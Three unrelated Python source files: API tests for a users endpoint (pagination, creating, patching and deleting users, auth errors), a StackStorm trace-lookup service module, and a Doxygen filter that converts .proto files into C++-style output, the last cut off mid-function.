'changed_on': DEFAULT_TIME,
'created_on': DEFAULT_TIME,
'email': 'mytest@test1.org',
'fail_login_count': None,
'first_name': 'test1',
'last_login': None,
'last_name': 'test1',
'login_count': None,
'roles': [],
'username': 'TEST_USER1',
}
def test_should_respond_404(self):
response = self.client.get("/api/v1/users/invalid-user", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 404
assert {
'detail': "The User with username `invalid-user` was not found",
'status': 404,
'title': 'User not found',
'type': EXCEPTIONS_LINK_MAP[404],
} == response.json
def test_should_raises_401_unauthenticated(self):
response = self.client.get("/api/v1/users/TEST_USER1")
assert_401(response)
def test_should_raise_403_forbidden(self):
response = self.client.get(
"/api/v1/users/TEST_USER1", environ_overrides={'REMOTE_USER': "test_no_permissions"}
)
assert response.status_code == 403
class TestGetUsers(TestUserEndpoint):
def test_should_response_200(self):
response = self.client.get("/api/v1/users", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert response.json["total_entries"] == 2
usernames = [user["username"] for user in response.json["users"] if user]
assert usernames == ['test', 'test_no_permissions']
def test_should_raises_401_unauthenticated(self):
response = self.client.get("/api/v1/users")
assert_401(response)
def test_should_raise_403_forbidden(self):
response = self.client.get("/api/v1/users", environ_overrides={'REMOTE_USER': "test_no_permissions"})
assert response.status_code == 403
class TestGetUsersPagination(TestUserEndpoint):
@parameterized.expand(
[
("/api/v1/users?limit=1", ["test"]),
("/api/v1/users?limit=2", ["test", "test_no_permissions"]),
(
"/api/v1/users?offset=5",
[
"TEST_USER4",
"TEST_USER5",
"TEST_USER6",
"TEST_USER7",
"TEST_USER8",
"TEST_USER9",
"TEST_USER10",
],
),
(
"/api/v1/users?offset=0",
[
"test",
"test_no_permissions",
"TEST_USER1",
"TEST_USER2",
"TEST_USER3",
"TEST_USER4",
"TEST_USER5",
"TEST_USER6",
"TEST_USER7",
"TEST_USER8",
"TEST_USER9",
"TEST_USER10",
],
),
("/api/v1/users?limit=1&offset=5", ["TEST_USER4"]),
("/api/v1/users?limit=1&offset=1", ["test_no_permissions"]),
(
"/api/v1/users?limit=2&offset=2",
["TEST_USER1", "TEST_USER2"],
),
]
)
def test_handle_limit_offset(self, url, expected_usernames):
users = self._create_users(10)
self.session.add_all(users)
self.session.commit()
response = self.client.get(url, environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert response.json["total_entries"] == 12
usernames = [user["username"] for user in response.json["users"] if user]
assert usernames == expected_usernames
def test_should_respect_page_size_limit_default(self):
users = self._create_users(200)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
# Account for the 2 users created by the configured_app fixture
assert response.json["total_entries"] == 200 + len(['test', 'test_no_permissions'])
assert len(response.json["users"]) == 100
def test_should_response_400_with_invalid_order_by(self):
users = self._create_users(2)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users?order_by=myname", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 400
msg = "Ordering with 'myname' is disallowed or the attribute does not exist on the model"
assert response.json['detail'] == msg
def test_limit_of_zero_should_return_default(self):
users = self._create_users(200)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users?limit=0", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
# Account for the 2 users created by the configured_app fixture
assert response.json["total_entries"] == 200 + len(['test', 'test_no_permissions'])
assert len(response.json["users"]) == 100
@conf_vars({("api", "maximum_page_limit"): "150"})
def test_should_return_conf_max_if_req_max_above_conf(self):
users = self._create_users(200)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users?limit=180", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert len(response.json['users']) == 150
EXAMPLE_USER_NAME = "example_user"
def _delete_example_user():
with create_session() as session:
user = session.query(User).filter(User.username == EXAMPLE_USER_NAME).first()
if user is None:
return
user.roles = []
session.delete(user)
@pytest.fixture()
def autoclean_username():
_delete_example_user()
yield EXAMPLE_USER_NAME
_delete_example_user()
@pytest.fixture()
def autoclean_user_payload(autoclean_username):
return {
"username": autoclean_username,
"password": "resutsop",
"email": "test@example.com",
"first_name": "Example",
"last_name": "User",
}
@pytest.fixture()
def autoclean_admin_user(configured_app, autoclean_user_payload):
security_manager = configured_app.appbuilder.sm
return security_manager.add_user(
role=security_manager.find_role("Admin"),
**autoclean_user_payload,
)
class TestPostUser(TestUserEndpoint):
def test_with_default_role(self, autoclean_username, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
security_manager = self.app.appbuilder.sm
user = security_manager.find_user(autoclean_username)
assert user is not None
assert user.roles == [security_manager.find_role("Public")]
def test_with_custom_roles(self, autoclean_username, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json={"roles": [{"name": "User"}, {"name": "Viewer"}], **autoclean_user_payload},
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
security_manager = self.app.appbuilder.sm
user = security_manager.find_user(autoclean_username)
assert user is not None
assert {r.name for r in user.roles} == {"User", "Viewer"}
def test_unauthenticated(self, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
)
assert response.status_code == 401, response.json
def test_forbidden(self, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test_no_permissions"},
)
assert response.status_code == 403, response.json
def test_already_exists(self, autoclean_username, autoclean_user_payload):
create_user(self.app, username=autoclean_username, role_name="TestNoPermissions")
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 409, response.json
@pytest.mark.parametrize(
"payload_converter, error_message",
[
pytest.param(
lambda p: {k: v for k, v in p.items() if k != "username"},
"{'username': ['Missing data for required field.']}",
id="missing-required",
),
pytest.param(
lambda p: {"i-am": "a typo", **p},
"{'i-am': ['Unknown field.']}",
id="unknown-user-field",
),
pytest.param(
lambda p: {**p, "roles": [{"also": "a typo", "name": "User"}]},
"{'roles': {0: {'also': ['Unknown field.']}}}",
id="unknown-role-field",
),
pytest.param(
lambda p: {**p, "roles": [{"name": "God"}, {"name": "User"}, {"name": "Overlord"}]},
"Unknown roles: 'God', 'Overlord'",
id="unknown-role",
),
],
)
def test_invalid_payload(self, autoclean_user_payload, payload_converter, error_message):
response = self.client.post(
"/api/v1/users",
json=payload_converter(autoclean_user_payload),
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 400, response.json
assert response.json == {
'detail': error_message,
'status': 400,
'title': "Bad Request",
'type': EXCEPTIONS_LINK_MAP[400],
}
class TestPatchUser(TestUserEndpoint):
@pytest.mark.usefixtures("autoclean_admin_user")
def test_change(self, autoclean_username, autoclean_user_payload):
autoclean_user_payload["first_name"] = "Changed"
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
# The first name is changed.
data = response.json
assert data["first_name"] == "Changed"
assert data["last_name"] == "User"
@pytest.mark.usefixtures("autoclean_admin_user")
def test_change_with_update_mask(self, autoclean_username, autoclean_user_payload):
autoclean_user_payload["first_name"] = "Changed"
autoclean_user_payload["last_name"] = "Overlord"
response = self.client.patch(
f"/api/v1/users/{autoclean_username}?update_mask=first_name",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
# The first name is changed, but the last name isn't since we masked it.
data = response.json
assert data["first_name"] == "Changed"
assert data["last_name"] == "User"
@pytest.mark.usefixtures("autoclean_admin_user")
@unittest.mock.patch(
"airflow.api_connexion.endpoints.user_endpoint.generate_password_hash",
return_value="fake-hashed-pass",
)
def test_password_hashed(
self,
mock_generate_password_hash,
autoclean_username,
autoclean_user_payload,
):
autoclean_user_payload["password"] = "new-pass"
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
assert "password" not in response.json
mock_generate_password_hash.assert_called_once_with("new-pass")
password_in_db = (
self.session.query(User.password).filter(User.username == autoclean_username).scalar()
)
assert password_in_db == "fake-hashed-pass"
@pytest.mark.usefixtures("autoclean_admin_user")
def test_replace_roles(self, autoclean_username, autoclean_user_payload):
# Patching a user's roles should replace the entire list.
autoclean_user_payload["roles"] = [{"name": "User"}, {"name": "Viewer"}]
response = self.client.patch(
f"/api/v1/users/{autoclean_username}?update_mask=roles",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
assert {d["name"] for d in response.json["roles"]} == {"User", "Viewer"}
@pytest.mark.usefixtures("autoclean_admin_user")
def test_unchanged(self, autoclean_username, autoclean_user_payload):
# Should allow a PATCH that changes nothing.
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
expected = {k: v for k, v in autoclean_user_payload.items() if k != "password"}
assert {k: response.json[k] for k in expected} == expected
@pytest.mark.usefixtures("autoclean_admin_user")
def test_unauthenticated(self, autoclean_username, autoclean_user_payload):
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
)
assert response.status_code == 401, response.json
@pytest.mark.usefixtures("autoclean_admin_user")
def test_forbidden(self, autoclean_username, autoclean_user_payload):
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test_no_permissions"},
)
assert response.status_code == 403, response.json
def test_not_found(self, autoclean_username, autoclean_user_payload):
# This test does not populate autoclean_admin_user into the database.
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 404, response.json
@pytest.mark.parametrize(
"payload_converter, error_message",
[
pytest.param(
lambda p: {k: v for k, v in p.items() if k != "username"},
"{'username': ['Missing data for required field.']}",
id="missing-required",
),
pytest.param(
lambda p: {"i-am": "a typo", **p},
"{'i-am': ['Unknown field.']}",
id="unknown-user-field",
),
pytest.param(
lambda p: {**p, "roles": [{"also": "a typo", "name": "User"}]},
"{'roles': {0: {'also': ['Unknown field.']}}}",
id="unknown-role-field",
),
pytest.param(
lambda p: {**p, "roles": [{"name": "God"}, {"name": "User"}, {"name": "Overlord"}]},
"Unknown roles: 'God', 'Overlord'",
id="unknown-role",
),
],
)
@pytest.mark.usefixtures("autoclean_admin_user")
def test_invalid_payload(
self,
autoclean_username,
autoclean_user_payload,
payload_converter,
error_message,
):
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=payload_converter(autoclean_user_payload),
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 400, response.json
assert response.json == {
'detail': error_message,
'status': 400,
'title': "Bad Request",
'type': EXCEPTIONS_LINK_MAP[400],
}
class TestDeleteUser(TestUserEndpoint):
@pytest.mark.usefixtures("autoclean_admin_user")
def test_delete(self, autoclean_username):
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 204, response.json # NO CONTENT.
assert self.session.query(count(User.id)).filter(User.username == autoclean_username).scalar() == 0
@pytest.mark.usefixtures("autoclean_admin_user")
def test_unauthenticated(self, autoclean_username):
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
)
assert response.status_code == 401, response.json
assert self.session.query(count(User.id)).filter(User.username == autoclean_username).scalar() == 1
@pytest.mark.usefixtures("autoclean_admin_user")
def test_forbidden(self, autoclean_username):
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
environ_overrides={"REMOTE_USER": "test_no_permissions"},
)
assert response.status_code == 403, response.json
assert self.session.query(count(User.id)).filter(User.username == autoclean_username).scalar() == 1
def test_not_found(self, autoclean_username):
# This test does not populate autoclean_admin_user into the database.
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 404, response.json
|
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from mongoengine import ValidationError
from st2common import log as logging
from st2common.constants.triggers import ACTION_SENSOR_TRIGGER, NOTIFY_TRIGGER
from st2common.constants.trace import TRACE_CONTEXT
from st2common.exceptions.db import StackStormDBObjectNotFoundError
from st2common.exceptions.trace import UniqueTraceNotFoundException
from st2common.models.api.trace import TraceContext
from st2common.models.db.trace import TraceDB, TraceComponentDB
from st2common.models.system.common import ResourceReference
from st2common.persistence.execution import ActionExecution
from st2common.persistence.trace import Trace
from st2common.services import executions
import six
LOG = logging.getLogger(__name__)
__all__ = [
"get_trace_db_by_action_execution",
"get_trace_db_by_rule",
"get_trace_db_by_trigger_instance",
"get_trace",
"add_or_update_given_trace_context",
"add_or_update_given_trace_db",
"get_trace_component_for_action_execution",
"get_trace_component_for_rule",
"get_trace_component_for_trigger_instance",
]
ACTION_SENSOR_TRIGGER_REF = ResourceReference.to_string_reference(
pack=ACTION_SENSOR_TRIGGER["pack"], name=ACTION_SENSOR_TRIGGER["name"]
)
NOTIFY_TRIGGER_REF = ResourceReference.to_string_reference(
pack=NOTIFY_TRIGGER["pack"], name=NOTIFY_TRIGGER["name"]
)
def _get_valid_trace_context(trace_context):
"""
Check that trace_context is a valid type and return a TraceContext object.
"""
if not isinstance(trace_context, (TraceContext, dict)):
raise TypeError(
"The trace context has a value that is not a dictionary"
f" (was {type(trace_context)})."
)
# Pretty much abuse the dynamic nature of python to make it possible to support
# both dict and TraceContext types.
if isinstance(trace_context, dict):
trace_context = TraceContext(**trace_context)
return trace_context
def _get_single_trace_by_component(**component_filter):
"""
Tries to return a single Trace matching component_filter. Raises an exception
when the filter matches more than one Trace.
"""
traces = Trace.query(**component_filter)
if len(traces) == 0:
return None
elif len(traces) > 1:
raise UniqueTraceNotFoundException(
"More than 1 trace matching %s found." % component_filter
)
return traces[0]
def get_trace_db_by_action_execution(action_execution=None, action_execution_id=None):
if action_execution:
action_execution_id = str(action_execution.id)
return _get_single_trace_by_component(
action_executions__object_id=action_execution_id
)
def get_trace_db_by_rule(rule=None, rule_id=None):
if rule:
rule_id = str(rule.id)
# by rule could return multiple traces
return Trace.query(rules__object_id=rule_id)
def get_trace_db_by_trigger_instance(trigger_instance=None, trigger_instance_id=None):
if trigger_instance:
trigger_instance_id = str(trigger_instance.id)
return _get_single_trace_by_component(
trigger_instances__object_id=trigger_instance_id
)
def get_trace(trace_context, ignore_trace_tag=False):
"""
:param trace_context: context object using which a trace can be found.
:type trace_context: ``dict`` or ``TraceContext``
:param ignore_trace_tag: If True, ignore the trace_tag even when it is provided.
:type ignore_trace_tag: ``bool``
:rtype: ``TraceDB``
"""
trace_context = _get_valid_trace_context(trace_context)
if not trace_context.id_ and not trace_context.trace_tag:
raise ValueError("Atleast one of id_ or trace_tag should be specified.")
if trace_context.id_:
try:
return Trace.get_by_id(trace_context.id_)
except (ValidationError, ValueError):
LOG.warning(
'Database lookup for Trace with id="%s" failed.',
trace_context.id_,
exc_info=True,
)
raise StackStormDBObjectNotFoundError(
'Unable to find Trace with id="%s"' % trace_context.id_
)
if ignore_trace_tag:
return None
traces = Trace.query(trace_tag=trace_context.trace_tag)
# Assume this method only handles 1 trace.
if len(traces) > 1:
raise UniqueTraceNotFoundException(
"More than 1 Trace matching %s found." % trace_context.trace_tag
)
return traces[0]
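# Illustrative usage sketch (not part of the original module): looking up a trace by
# tag only. get_trace() accepts either a dict or a TraceContext, and at least one of
# id_ / trace_tag must be set. The tag below is a placeholder; this helper is never
# called anywhere in this module.
def _example_lookup_trace_by_tag(tag="example-trace-tag"):
    # Raises UniqueTraceNotFoundException if more than one trace shares the tag.
    return get_trace({"trace_tag": tag})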
def get_trace_db_by_live_action(liveaction):
"""
Given a liveaction, makes a best-effort attempt to return a TraceDB.
1. From trace_context in liveaction.context
2. From parent in liveaction.context
3. From action_execution associated with provided liveaction
4. Creates a new TraceDB (which calling method is on the hook to persist).
:param liveaction: liveaction from which to figure out a TraceDB.
:type liveaction: ``LiveActionDB``
:returns: (boolean, TraceDB) if the TraceDB was created(but not saved to DB) or
retrieved from the DB and the TraceDB itself.
:rtype: ``tuple``
"""
trace_db = None
created = False
# 1. Try to get trace_db from liveaction context.
# via trigger_instance + rule or via user specified trace_context
trace_context = liveaction.context.get(TRACE_CONTEXT, None)
if trace_context:
trace_context = _get_valid_trace_context(trace_context)
trace_db = get_trace(trace_context=trace_context, ignore_trace_tag=True)
# found a trace_context but no trace_db. This implies a user supplied
# trace_tag so create a new trace_db
if not trace_db:
trace_db = TraceDB(trace_tag=trace_context.trace_tag)
created = True
return (created, trace_db)
# 2. If not found then check if parent context contains an execution_id.
# This covers the case of a child execution of a workflow.
parent_context = executions.get_parent_context(liveaction_db=liveaction)
if not trace_context and parent_context:
parent_execution_id = parent_context.get("execution_id", None)
if parent_execution_id:
# go straight to a trace_db. If there is a parent execution then that must
# be associated with a Trace.
trace_db = get_trace_db_by_action_execution(
action_execution_id=parent_execution_id
)
if not trace_db:
raise StackStormDBObjectNotFoundError(
"No trace found for execution %s" % parent_execution_id
)
return (created, trace_db)
# 3. Check if the action_execution associated with liveaction leads to a trace_db
execution = ActionExecution.get(liveaction__id=str(liveaction.id))
if execution:
trace_db = get_trace_db_by_action_execution(action_execution=execution)
# 4. No trace_db found, therefore create one. This typically happens
# when execution is run by hand.
if not trace_db:
trace_db = TraceDB(trace_tag="execution-%s" % str(liveaction.id))
created = True
return (created, trace_db)
def add_or_update_given_trace_context(
trace_context, action_executions=None, rules=None, trigger_instances=None
):
"""
Will update an existing Trace or add a new Trace. This method will only look for the exact
Trace identified by the trace_context. Even if the trace_context contains a trace_tag,
it shall not be used to look up a Trace.
* If an exact matching Trace is not found a new Trace is created
* Whenever only a trace_tag is supplied a new Trace is created.
:param trace_context: context object using which a trace can be found. If not found
trace_context.trace_tag is used to start new trace.
:type trace_context: ``dict`` or ``TraceContext``
:param action_executions: The action_executions to be added to the Trace. Should be a list
of object_ids or dicts containing object_ids and caused_by.
:type action_executions: ``list``
:param rules: The rules to be added to the Trace. Should be a list of object_ids or dicts
containing object_ids and caused_by.
:type rules: ``list``
:param trigger_instances: The trigger_instances to be added to the Trace. Should be a list
of object_ids or dicts containing object_ids and caused_by.
:type trigger_instances: ``list``
:rtype: ``TraceDB``
"""
trace_db = get_trace(trace_context=trace_context, ignore_trace_tag=True)
if not trace_db:
# since trace_db is None need to end up with a valid trace_context
trace_context = _get_valid_trace_context(trace_context)
trace_db = TraceDB(trace_tag=trace_context.trace_tag)
return add_or_update_given_trace_db(
trace_db=trace_db,
action_executions=action_executions,
rules=rules,
trigger_instances=trigger_instances,
)
def add_or_update_given_trace_db(
trace_db, action_executions=None, rules=None, trigger_instances=None
):
"""
Will update an existing Trace.
:param trace_db: The TraceDB to update.
:type trace_db: ``TraceDB``
:param action_executions: The action_executions to be added to the Trace. Should be a list
of object_ids or dicts containing object_ids and caused_by.
:type action_executions: ``list``
:param rules: The rules to be added to the Trace. Should be a list of object_ids or dicts
containing object_ids and caused_by.
:type rules: ``list``
:param trigger_instances: The trigger_instances to be added to the Trace. Should be a list
of object_ids or dicts containing object_ids and caused_by.
:type trigger_instances: ``list``
:rtype: ``TraceDB``
"""
if trace_db is None:
raise ValueError("trace_db should be non-None.")
if not action_executions:
action_executions = []
action_executions = [
_to_trace_component_db(component=action_execution)
for action_execution in action_executions
]
if not rules:
rules = []
rules = [_to_trace_component_db(component=rule) for rule in rules]
if not trigger_instances:
trigger_instances = []
trigger_instances = [
_to_trace_component_db(component=trigger_instance)
for trigger_instance in trigger_instances
]
# If an id exists then this is an update and we do not want to perform
# an upsert so use push_components which will use the push operator.
if trace_db.id:
return Trace.push_components(
trace_db,
action_executions=action_executions,
rules=rules,
trigger_instances=trigger_instances,
)
trace_db.action_executions = action_executions
trace_db.rules = rules
trace_db.trigger_instances = trigger_instances
return Trace.add_or_update(trace_db)
def get_trace_component_for_action_execution(action_execution_db, liveaction_db):
"""
Returns the trace_component compatible dict representation of an actionexecution.
:param action_execution_db: ActionExecution to translate
:type action_execution_db: ActionExecutionDB
:param liveaction_db: LiveAction corresponding to the supplied ActionExecution
:type liveaction_db: LiveActionDB
:rtype: ``dict``
"""
if not action_execution_db:
raise ValueError("action_execution_db expected.")
trace_component = {
"id": str(action_execution_db.id),
"ref": str(action_execution_db.action.get("ref", "")),
}
caused_by = {}
parent_context = executions.get_parent_context(liveaction_db=liveaction_db)
if liveaction_db and parent_context:
caused_by["type"] = "action_execution"
caused_by["id"] = liveaction_db.context["parent"].get("execution_id", None)
elif action_execution_db.rule and action_execution_db.trigger_instance:
# Once RuleEnforcement is available that can be used instead.
caused_by["type"] = "rule"
caused_by["id"] = "%s:%s" % (
action_execution_db.rule["id"],
action_execution_db.trigger_instance["id"],
)
trace_component["caused_by"] = caused_by
return trace_component
def get_trace_component_for_rule(rule_db, trigger_instance_db):
"""
Returns the trace_component compatible dict representation of a rule.
:param rule_db: The rule to translate
:type rule_db: RuleDB
:param trigger_instance_db: The TriggerInstance with causal relation to rule_db
:type trigger_instance_db: TriggerInstanceDB
:rtype: ``dict``
"""
trace_component = {"id": str(rule_db.id), "ref": rule_db.ref}
caused_by = {}
if trigger_instance_db:
# Once RuleEnforcement is available that can be used instead.
caused_by["type"] = "trigger_instance"
caused_by["id"] = str(trigger_instance_db.id)
trace_component["caused_by"] = caused_by
return trace_component
def get_trace_component_for_trigger_instance(trigger_instance_db):
"""
Returns the trace_component compatible dict representation of a triggerinstance.
:param trigger_instance_db: The TriggerInstance to translate
:type trigger_instance_db: TriggerInstanceDB
:rtype: ``dict``
"""
trace_component = {
"id": str(trigger_instance_db.id),
"ref": trigger_instance_db.trigger,
}
caused_by = {}
# Special handling for ACTION_SENSOR_TRIGGER and NOTIFY_TRIGGER where we
# know how to maintain the links.
if (
trigger_instance_db.trigger == ACTION_SENSOR_TRIGGER_REF
or trigger_instance_db.trigger == NOTIFY_TRIGGER_REF
):
caused_by["type"] = "action_execution"
# For both the action trigger and the notify trigger, execution_id is stored in the payload.
caused_by["id"] = trigger_instance_db.payload["execution_id"]
trace_component["caused_by"] = caused_by
return trace_component
def _to_trace_component_db(component):
"""
Takes the component as a string or a dict and constructs a TraceComponentDB.
:param component: Should identify the component. If a string, it should be the id of
the component. If a dict, it should contain the id and the caused_by.
:type component: ``bson.ObjectId`` or ``dict``
:rtype: ``TraceComponentDB``
"""
if not isinstance(component, (six.string_types, dict)):
raise ValueError("Expected component to be str or dict, got %s" % type(component))
object_id = (
component if isinstance(component, six.string_types) else component["id"]
)
ref = component.get("ref", "") if isinstance(component, dict) else ""
caused_by = component.get("caused_by", {}) if isinstance(component, dict) else {}
return TraceComponentDB(object_id=object_id, ref=ref, caused_by=caused_by)
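# Illustrative usage sketch (not part of the original module): recording components
# against a trace identified only by its tag. The ids are placeholders; as
# _to_trace_component_db() above expects, each component may be a bare object id
# string or a dict with 'id', optional 'ref' and 'caused_by'. Never called here.
def _example_record_execution_on_trace(execution_id, trigger_instance_id):
    return add_or_update_given_trace_context(
        trace_context={"trace_tag": "example-trace"},
        action_executions=[
            {
                "id": execution_id,
                "caused_by": {"type": "trigger_instance", "id": trigger_instance_id},
            }
        ],
        trigger_instances=[trigger_instance_id],
    )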
|
|
#!/usr/bin/python3
##
# Doxygen filter for Google Protocol Buffers .proto files.
# This script converts .proto files into C++ style ones
# and prints the output to standard output.
#
# version 0.6-beta-vg
#
# How to enable this filter in Doxygen:
# 1. Generate Doxygen configuration file with command 'doxygen -g <filename>'
# e.g. doxygen -g doxyfile
# 2. In the Doxygen configuration file, find JAVADOC_AUTOBRIEF and set it enabled
# JAVADOC_AUTOBRIEF = YES
# 3. In the Doxygen configuration file, find FILE_PATTERNS and add *.proto
# FILE_PATTERNS = *.proto
# 4. In the Doxygen configuration file, find EXTENSION_MAPPING and add proto=C
# EXTENSION_MAPPING = proto=C
# 5. In the Doxygen configuration file, find INPUT_FILTER and add this script
# INPUT_FILTER = "python3 proto2cpp.py"
# 6. Run Doxygen with the modified configuration
# doxygen doxyfile
#
#
# Copyright (C) 2016 Regents of the University of California
# Copyright (C) 2012-2015 Timo Marjoniemi
# All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##
import os
import sys
import re
import fnmatch
import inspect
## Class for converting Google Protocol Buffers .proto files into C++ style output to enable Doxygen usage.
##
## The C++ style output is printed into standard output.<br />
## There are three different logging levels for the class:
## <ul><li>#logNone: do not log anything</li>
## <li>#logErrors: log errors only</li>
## <li>#logAll: log everything</li></ul>
## Logging level is determined by \c #logLevel.<br />
## Error logs are written to file determined by \c #errorLogFile.<br />
## Debug logs are written to file determined by \c #logFile.
#
class proto2cpp:
## Logging level: do not log anything.
logNone = 0
## Logging level: log errors only.
logErrors = 1
## Logging level: log everything.
logAll = 2
## Constructor
#
def __init__(self):
## Debug log file name.
self.logFile = "proto2cpp.log"
## Error log file name.
self.errorLogFile = "proto2cpp.error.log"
## Logging level.
self.logLevel = self.logNone
## Handles a file.
##
## If @p filename has a .proto suffix, it is processed through parseFile().
## Otherwise it is printed to stdout as is except for file \c proto2cpp.py without
## path since it's the script given to python for processing.
##
## @param filename Name of the file to be handled.
#
def handleFile(self, filename):
if fnmatch.fnmatch(filename, '*.proto'):
self.log('\nXXXXXXXXXX\nXX ' + filename + '\nXXXXXXXXXX\n\n')
# Open the file. Use try to detect whether or not we have an actual file.
try:
with open(filename, 'r') as inputFile:
self.parseFile(inputFile)
pass
except IOError as e:
self.logError('the file ' + filename + ' could not be opened for reading')
elif not fnmatch.fnmatch(filename, os.path.basename(inspect.getfile(inspect.currentframe()))):
self.log('\nXXXXXXXXXX\nXX ' + filename + '\nXXXXXXXXXX\n\n')
try:
with open(filename, 'r') as theFile:
output = ''
for theLine in theFile:
output += theLine
print(output)
self.log(output)
except IOError as e:
self.logError('the file ' + filename + ' could not be opened for reading')
else:
self.log('\nXXXXXXXXXX\nXX ' + filename + ' --skipped--\nXXXXXXXXXX\n\n')
## Parser function.
##
## The function takes a .proto file object as input
## parameter and modifies the contents into C++ style.
## The modified data is printed into standard output.
##
## @param inputFile Input file object
#
def parseFile(self, inputFile):
# Go through the input file line by line.
isEnum = False
    isPackage = False
# This variable is here as a workaround for not getting extra line breaks (each line
# ends with a line separator and print() method will add another one).
# We will be adding lines into this var and then print the var out at the end.
theOutput = ''
for line in inputFile:
# Search for comment ("//") and add one more slash character ("/") to the comment
# block to make Doxygen detect it.
matchComment = re.search("//", line)
      # Search for a semicolon and, if one is found before the comment, add a third slash
      # ("/") and a less-than ("<") character to the comment to make Doxygen detect it.
matchSemicolon = re.search(";", line)
if matchSemicolon is not None and (matchComment is not None and matchSemicolon.start() < matchComment.start()):
line = line[:matchComment.start()] + "///<" + line[matchComment.end():]
elif matchComment is not None:
line = line[:matchComment.start()] + "///" + line[matchComment.end():]
# Search for "package " and if one is found before comment, make a namespace
matchPackage = re.search(r"\bpackage\b", line)
if matchPackage is not None and (matchComment is None or matchPackage.start() < matchComment.start()):
isPackage = True
# Convert to C++-style separator and block instead of statement
line = "namespace" + line[:matchPackage.start()] + line[matchPackage.end():].replace(".", "::").replace(";", " {")
# Search for "repeated" fields and make them template-y
matchRepeated = re.search(r"\brepeated\b", line)
if matchRepeated is not None and (matchComment is None or matchRepeated.start() < matchComment.start()):
# Convert to a template
line = re.sub(r'repeated\s+(\S+)', r'repeated<\1>', line)
# Search for "enum" and if one is found before comment,
# start changing all semicolons (";") to commas (",").
matchEnum = re.search(r"\benum\b", line)
if matchEnum is not None and (matchComment is None or matchEnum.start() < matchComment.start()):
isEnum = True
# Search again for semicolon if we have detected an enum, and replace semicolon with comma.
if isEnum is True and re.search(";", line) is not None:
matchSemicolon = re.search(";", line)
line = line[:matchSemicolon.start()] + "," + line[matchSemicolon.end():]
# Search for a closing brace.
matchClosingBrace = re.search("}", line)
if isEnum is True and matchClosingBrace is not None:
line = line[:matchClosingBrace.start()] + "};" + line[matchClosingBrace.end():]
isEnum = False
elif isEnum is False and re.search("}", line) is not None:
# Message (to be struct) ends => add semicolon so that it'll
# be a proper C(++) struct and Doxygen will handle it correctly.
line = line[:matchClosingBrace.start()] + "};" + line[matchClosingBrace.end():]
# Search for 'message' and replace it with 'struct' unless 'message' is behind a comment.
matchMsg = re.search(r"\bmessage\b", line)
if matchMsg is not None and (matchComment is None or matchMsg.start() < matchComment.start()):
output = "struct" + line[:matchMsg.start()] + line[matchMsg.end():]
theOutput += output
else:
theOutput += line
if isPackage:
# Close the package namespace
theOutput += "}"
isPackage = False
# Now that we've got all lines in the string let's split the lines and print out
# one by one.
